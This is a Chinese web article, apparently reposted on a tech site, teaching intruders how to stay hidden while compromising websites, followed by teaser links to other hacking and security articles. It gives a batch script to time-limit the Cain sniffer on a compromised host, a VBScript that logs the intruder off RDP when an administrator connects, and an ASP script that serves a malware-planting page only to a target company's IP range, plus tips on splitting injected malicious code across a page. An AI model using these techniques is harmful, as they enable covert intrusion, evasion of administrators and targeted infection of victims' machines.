入侵网站如何更好隐蔽自己?这里有隐蔽技巧
前两期中的专栏中,针对细节入侵这一专题,我分别写了我在内网和注入中注意到的一些细节。其实入侵过程中,有时候难免会与管理员面对面,如何更好的隐蔽自己也是很重要的,一旦不注意,入侵工作往往前功尽弃。这期专栏中,我就如何隐蔽自己所做的一些工作,所注意到的细节来写一下。
先来说一下嗅探吧。大家常用的工具是cain,用法大家都会了。但是cain在嗅探过程中,如果遇到流量较大的目标机,往往会把装cain的主机搞死,从而引起管理员的注意。像有的时候,嗅了一阵后,就会把3389搞死。我也没有更好的办法,只能让cain嗅一段时间后停止,再重新开始。如果每次都是手工去停止cain,有时候时间掌握的不及时,3389已经死掉了。其实解决这个问题很简单,一个简单的批处理脚本就可以了。脚本内容如下:
★
ping 127.0.0.1 -n 5000>nul
taskkill /F /PID 4144
★
上边批处理脚本中,5000是秒数,用来控制cain的嗅探时间。4144是cain的进程数,可以自己用tasklist查一下就知道了。这样一来,你可以放心在嗅探这段时间内去做别的事了。
再来呢,用cain嗅探一般会在3389上,这时候如果碰到管理员登陆3389也不太好办,我的好友Netpatch写过一个终端监视脚本,一旦发现有两人同时登陆终端的话就注销自己。脚本内容如下:
★
on error resume next
set arg=wscript.arguments
If arg.count=0 then
wscript.echo "use:// cscript.exe FS.vbs port"
sleep 1000
wscript.quit
End If
Tport=arg(0)
Runs=false
While runs=false
Dim oShell,oExec,strOut,oRegExp,Matches,Match,Num,Tport
Set oShell = WScript.CreateObject("WScript.Shell")
Set oExec = oShell.Exec("netstat -an")
Set oRegExp = new RegExp
oRegExp.Pattern = "TCP[\s] [\d\.] :"&Tport&"[\s] [\d\.] :[\d] [\s] ESTABLISHED"
oRegExp.IgnoreCase = True
oRegExp.Global = True
Do While Not oExec.StdOut.AtEndOfStream
strOut = strOut & oExec.StdOut.ReadLine() & Chr(13) & Chr(10)
Loop
Set Matches = oRegExp.Execute(strOut)
Num = 0
For Each Match In Matches
Num = Num 1
Next
if num > 1 then
Runs=true
oShell.run "logoff"
end if
Set Matches = Nothing
Set oRegExp = Nothing
Set oExec = Nothing
Set oShell = Nothing
wend
★
用此脚本,登陆终端时打开就可以了,这也是一个比较好的隐藏自己的办法。
最后来说一下挂马。挂马的隐蔽方法也有很多,以前黑手上讲过几期。如果只是盲目的挂马多搞几台肉鸡的话,那个随便你了。但是有时候我们入侵了一个公司的 web站,目标却是他们的内网。这时候你挂马可能会挂出太多的无用机器,如果你知他们公司内网出口的IP段的话,我们可以限制一下IP段使其更有针对性。这个asp脚本如下:
<%
''获取访问者的地址
ip=Request.ServerVariables("REMOTE_ADDR")
'允许的IP地址段为
allowip1="221.221.221.1"
allowip2="221.221.221.254"
if checkip(ip,allowip1,allowip2)=true then
response.write "你挂马的页面"
end if
function checkip(ip,allowip1,allowip2)
dim check(4)
checkip=false
ipstr=split(ip,".")
allow1=split(allowip1,".")
allow2=split(allowip2,".")
if cint(allow1(0))>cint(allow2(0)) then ''判断IP地址段是否合法
response.write "禁止访问"
exit function
end if
for i=0 to ubound(ipstr)
if cint(allow1(i)) if cint(allow1(i))=cint(ipstr(i)) then check(i)=true checkip=true exit for else if cint(ipstr(i)) exit for else if cint(ipstr(i))>cint(allow2(i)) then check(i)=false checkip=false exit for else check(i)=true checkip=true end if end if end if else if cint(allow1(i))>cint(ipstr(i)) or cint(allow1(i)) check(i)=false checkip=false if i<>ubound(ipstr) then exit for end if else check(i)=true end if end if next if (check(0)=true and check(1)=true and check(2)=true and check(3)=false) and (cint(allow2(2))>cint(ipstr(2))) then checkip=true end if end function %> 这个脚本也许考虑得不太周到,但是我觉得足够用了。挂马的隐蔽方法也有很多,我最常用的是代码分隔法。记得剑心有篇文章,提到过最短的跨站方法,我们也可以用这种方法来挂马的。好比常规挂马语句 拆分一下转换为: ★ ★ 这样转换的好处是上边的每一行可以分开插入在同一页面不同行中,这样一来就会隐蔽一点了。当然如何更好的隐蔽自己有很多不同的办法,各人各有巧妙不同。这篇文章只是抛砖引玉,能引起大家的思考我就心满意足了。
u盘文件加密怎么做?U盘文件加密需要注意什么?
现在U盘的存储空间越来越大,读写速度越来越快,可以轻松存储大量的文件到U盘里面;同时,优盘具有便携性等特点,使得U盘的使用极为普遍。但是,优盘在方便了工作生活的同时,也面临着一些风险。尤其是当U盘文件
详情2018-01-10 08:43:37责编:llp 来源:驱动管家密码设置的隐患 这20个密码容易被盗,快改!
即使在经历了无数的黑客盗密事件之后,还是有很多人不知从中吸取教训,抑或是很多人根本不在意自己的账号密码是否安全!他们一直用着最简单最易记的密码,而这些往往也是账号密码被盗的主要原因。那么,你知道容
详情2018-01-26 13:30:37责编:llp 来源:驱动管家什么是openvpn漏洞?openvpn漏洞的危害
OpenVPN桌面客户端爆CSRF漏洞(可远程执行命令)受影响版本:windows版本的OpenVPN Access Server "Desktop Client " app。版本号为1 5 6(漏洞发现时的最新版)及以前的版本。OpenVPN Connect,Private Tunne
详情2018-01-03 13:38:05责编:llp 来源:驱动管家shell脚本怎么监控mysol服务器?shell脚本监控mysol服务器的步骤
监控MySQL服务是否正常,通常的思路为:检查3306端口是否启动,ps查看mysqld进程是否启动,命令行登录mysql执行语句返回结果,php或jsp程序检测(需要开发人员开发程序)等等;方法1:监听3306端口方法2:查看mys
详情2018-01-05 11:04:57责编:llp 来源:驱动管家利用insert Into进行注入?该怎么做?
刚才到了酷吧,坐在收银台旁边和收银的MM聊了几句话;突然看到 "电影影线 "有张海报,上面写着:凡是购买该站点卡密码最后一位数是6或7便可获赠面值5元的易卡一张;我想,这个网站整个数据在我手里,我要是把那几十
详情2018-03-03 09:58:49责编:llp 来源:驱动管家哪些微软技术能实现远程访问?微软怎么保证远程访问的安全?
远程访问一直是个热门话题,人们需要能够随时随地通过任何设备登录网络获取信息。过去利用特定设备或者特定位置访问网络的时代已经过去了,特别是在企业内,人们希望在任何时候都能获取企业信息,可能使用笔记本
详情2018-01-27 18:34:11责编:llp 来源:驱动管家netxray怎么用?netxray的十大使用说明
NetXRay是由Cinco Networks公司开发的一个用于高级分组检错的软件,功能很强大。IP地址查询工具。标题:NetXray使用说明之(1)启动Capture,进入Capture Setting,选择Profiles-->New,以Default为模板,起名叫p
详情2018-01-20 08:56:22责编:llp 来源:驱动管家rar密码破解工具:rar password recovery如何破解rar文件密码?
RAR是一款常见的压缩格式,主要运用于文件的存储与传递。互联网上提供下载的资源中,RAR格式占很大比重。出于安全的需求以及隐私的保护,有相当一部分的RAR文件被加上了密码,解不开密码的RAR文件如同垃圾文件一
详情2018-01-15 12:34:15责编:llp 来源:驱动管家入侵检测系统有什么漏洞?黑客用了什么入侵手法?
本文针对入侵检测系统的漏洞来了解一下黑客的入侵手法。一旦安装了网络入侵检测系统,网络入侵检测系统就会为你分析出网上出现的黑客攻击事件,而且你能用此入侵检测系统的反击功能,即时将这种联机猎杀或阻断。
详情2018-01-26 14:51:28责编:llp 来源:驱动管家libpng处理畸形格式的png图片存在漏洞
受影响系统: libpng libpng
详情2018-01-24 19:38:52责编:llp 来源:驱动管家
- 怎么在百度地图上获取坐标?百度地图坐标系统功能使用方法
- 怎么在ppt上修改默认的直线线型?
- 傲腾内存和固态硬盘哪个好?傲腾内存对比SSD的区别
- ssd固态硬盘的温度怎么查看?ssd固态硬盘温度多少正常
- 罗斯冰架逐渐冻结 科学家并不清楚其中的原因
- 新打卡地点:bilibili主题咖啡店
- 在win2008系统中怎么限制远程用户匿名访问
- 如何解决Win7下音响一个大声一个无声的问题
- 什么时候可以买小辣椒6?小辣椒6售价多少?
- 保护隐私,锤子手机rom如何隐藏分屏?
- 电脑打开淘宝网网页发现图片不显示或显示异常的四种解决方法
- 导致电脑黑屏的两个常见的原因分析与解决办法
- 利用IRIX的inpview漏洞获取权限的方法
- 探测社区管理员的密码 密码探测的方法是什么?
- 在支付宝上怎么补借条?支付宝补借条的方法
- 视频格式转换器哪个最好用?视频格式转换器的介绍
- 使用百度输入法怎么打出特殊符号?具体方法如下
- arc文件格式是什么?怎么在电脑上打开arc格式文件
- 罗技针对Craft键盘Logitech Options更新 追加对Lightroom支持
- 区块链究竟和代币到底有什么关系?